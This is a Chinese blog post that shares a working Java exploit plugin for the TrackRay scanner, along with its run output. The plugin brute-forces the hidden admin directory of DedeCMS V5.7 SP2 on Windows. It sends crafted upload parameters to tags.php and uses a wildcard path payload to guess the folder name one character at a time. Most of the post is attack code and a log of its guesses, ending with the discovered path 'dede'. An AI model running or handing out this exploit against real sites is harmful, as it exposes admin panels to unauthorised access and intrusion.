Dedecms V5.7 SP2 Windows下后台猜解

安全

TrackRay插件

因为用了Windows的特性,所以只在Windows环境下有效。

@Rule(param = {"target"} , websocket = true )
@Plugin(title = "dedecms windows下后台暴力猜解" , author = "blue")
public class DedeFindManage extends WebSocketPlugin {
    private String characters = "abcdefghijklmnopqrstuvwxyz0123456789_!#";
    private String url;
    @Override
    public boolean check(Map param) {
        url = param.get("target").toString();
        return !param.isEmpty();
    }

    @Override
    public Object start() {
        boolean flag = false;
        url = url.concat("/tags.php");
        String prefix = "";
        String payload = "./%s<</images/adminico.gif";
        char[] chars = characters.toCharArray();
        crawlerPage.getRequest().setUrl(url);
        crawlerPage.getRequest().setHttpMethod(HttpMethod.POST);
        Map params = new HashMap<String,String>();
        params.put("_FILES[mochazz][tmp_name]","");
        params.put("_FILES[mochazz][name]","0");
        params.put("_FILES[mochazz][size]","0");
        params.put("_FILES[mochazz][type]","image/gif");
        crawlerPage.getRequest().setParamMap(params);

        Fetcher fetcher = new Fetcher();
        for (int i = 1; i <=7; i++) {
            if (flag)
                break;
            ArrayList<String> list = new ArrayList<>();
            permutation1(list,characters, "", i);
            for (String str : list) {
                send("testing:"+str);
                params.put("_FILES[mochazz][tmp_name]",String.format(payload,str));
                fetcher.run(crawlerPage);
                String string = crawlerPage.getResponse().getStatus().getContentString();
                if (!StringUtils.contains(string , "Upload filetype not allow") && crawlerPage.getResponse().getStatus().getStatusCode() == 200)
                {
                    flag = true;
                    prefix = str;
                    break;
                }
            }
        }

        if (StringUtils.isNotBlank(prefix)){
            send("prefix:"+prefix);
            boolean f= false;
            for (int i = 0; i < 30; i++) {
                if (f)
                    break;
                for (char c : chars) {
                    if (c == chars[chars.length-1])
                        f=true;
                    String s = String.valueOf(c);
                    params.put("_FILES[mochazz][tmp_name]",String.format(payload,prefix+s));
                    fetcher.run(crawlerPage);
                    String string = crawlerPage.getResponse().getStatus().getContentString();
                    if (!string.contains("Upload filetype not allow") && crawlerPage.getResponse().getStatus().getStatusCode() == 200)
                    {
                        prefix+= s;
                        send("[+]"+prefix);
                        break;
                    }
                }
            }

            send("[+]后台地址为:"+prefix);
        }
        return prefix;
    }

    public  void permutation1(ArrayList<String> list, String str, String result, int len){
        
        if(result.length()==len){            //表示遍历完了一个全排列结果
            list.add(result);
        }
        else{
            for(int i=0;i<str.length();i++){
                if(result.indexOf(str.charAt(i))<0){    //返回指定字符在此字符串中第一次出现处的索引。
                    //System.out.println("字母:"+str.charAt(i));
                    permutation1(list, str, result+str.charAt(i), len);
                }
            }
        }

    }

    public static void main(String[] args) {

        DedeFindManage dede = new DedeFindManage();
        dede.setParam(new HashMap<String,Object>(){{
            put("target","http://localhost/dede/");
        }});

    }
}

运行结果

testing:a
testing:b
testing:c
testing:d
testing:e
testing:f
testing:g
testing:h
testing:i
testing:j
testing:k
testing:l
testing:m
testing:n
testing:o
testing:p
testing:q
testing:r
testing:s
testing:t
testing:u
testing:v
testing:w
testing:x
testing:y
testing:z
testing:0
testing:1
testing:2
testing:3
testing:4
testing:5
testing:6
testing:7
testing:8
testing:9
testing:_
testing:!
testing:#
testing:ab
testing:ac
testing:ad
testing:ae
testing:af
testing:ag
testing:ah
testing:ai
testing:aj
testing:ak
testing:al
testing:am
testing:an
testing:ao
testing:ap
testing:aq
testing:ar
testing:as
testing:at
testing:au
testing:av
testing:aw
testing:ax
testing:ay
testing:az
testing:a0
testing:a1
testing:a2
testing:a3
testing:a4
testing:a5
testing:a6
testing:a7
testing:a8
testing:a9
testing:a_
testing:a!
testing:a#
testing:ba
testing:bc
testing:bd
testing:be
testing:bf
testing:bg
testing:bh
testing:bi
testing:bj
testing:bk
testing:bl
testing:bm
testing:bn
testing:bo
testing:bp
testing:bq
testing:br
testing:bs
testing:bt
testing:bu
testing:bv
testing:bw
testing:bx
testing:by
testing:bz
testing:b0
testing:b1
testing:b2
testing:b3
testing:b4
testing:b5
testing:b6
testing:b7
testing:b8
testing:b9
testing:b_
testing:b!
testing:b#
testing:ca
testing:cb
testing:cd
testing:ce
testing:cf
testing:cg
testing:ch
testing:ci
testing:cj
testing:ck
testing:cl
testing:cm
testing:cn
testing:co
testing:cp
testing:cq
testing:cr
testing:cs
testing:ct
testing:cu
testing:cv
testing:cw
testing:cx
testing:cy
testing:cz
testing:c0
testing:c1
testing:c2
testing:c3
testing:c4
testing:c5
testing:c6
testing:c7
testing:c8
testing:c9
testing:c_
testing:c!
testing:c#
testing:da
testing:db
testing:dc
testing:de
prefix:de
[+]ded
[+]dede
[+]后台地址为:dede

参考

https://xz.aliyun.com/t/2064
https://www.cnblogs.com/zhaijiahui/p/8484667.html

发表留言

如未标注转载则文章均为本人原创,转载前先吱声,未授权转载我就锤爆你狗头。

人生在世,错别字在所难免,无需纠正。